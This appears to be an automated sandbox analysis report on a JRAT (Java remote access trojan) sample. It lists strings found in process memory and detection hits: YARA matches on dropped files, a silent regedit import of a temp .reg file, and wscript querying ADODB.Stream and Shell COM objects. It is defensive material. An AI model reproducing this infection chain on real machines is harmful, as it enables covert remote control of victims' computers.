Source: xcopy.exe, 00000015.00000003.1714657743.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1709635619.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1712140938.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1732774705.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733577711.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1708776486.000000000348E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744124031.000000000348F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1742568613.000000000348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: xcopy.exe, 00000015.00000003.1799325205.0000000003490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2004/em-rdf#
Source: xcopy.exe, 00000015.00000003.1799325205.0000000003490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: xcopy.exe, 00000015.00000003.1765528442.000000000348E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/A
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/A$
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/a/lang$
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimitK
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit(L
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimitC
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo:
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepthche/xerC
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimitutil/7
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit;E
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimitJ
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimits
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit;T
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimitb
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimitk
Source: java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager#
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager#H
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/(
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD3
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD=
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/eam;
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1761890129.0000000003570000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entities#L
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entities7
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entitiesex
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1761890129.0000000003570000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-parameter-entities3
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixes3
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixesk
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixesna(
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixesrn(
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces
Source: java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces&
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespacesS
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2C
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/validation
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/validationSB
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/(
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/nt(
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009D48000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004870000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jrat.io

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: C:\Users\user\AppData\Local\Temp\_0.963648387626213409653739306438380.class, type: DROPPED Matched rule: Detects JRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\ultekbvsw.txt, type: DROPPED Matched rule: Detects JRAT malware Author: Florian Roth
Found suspicious ZIP file
Source: ffjcext.zip.21.dr Zip Entry: {CAFEEFAC-0018-0000-0381-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.js
Uses regedit.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mqjqrgZaqQ856862126040995288.reg
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Creates files inside the system directory
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Windows\SysWOW64\test.txt Jump to behavior
Detected potential crypto function
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_03036A10 6_2_03036A10
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02FF3758 6_2_02FF3758
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Windows266478547194213581.dll A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll 8594D0EDA4E4367BC3473032552C5D0F9931C283E6C4CB8D7C1E7D9F61E13506
PE file does not import any functions
Source: api-ms-win-core-sysinfo-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-2-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
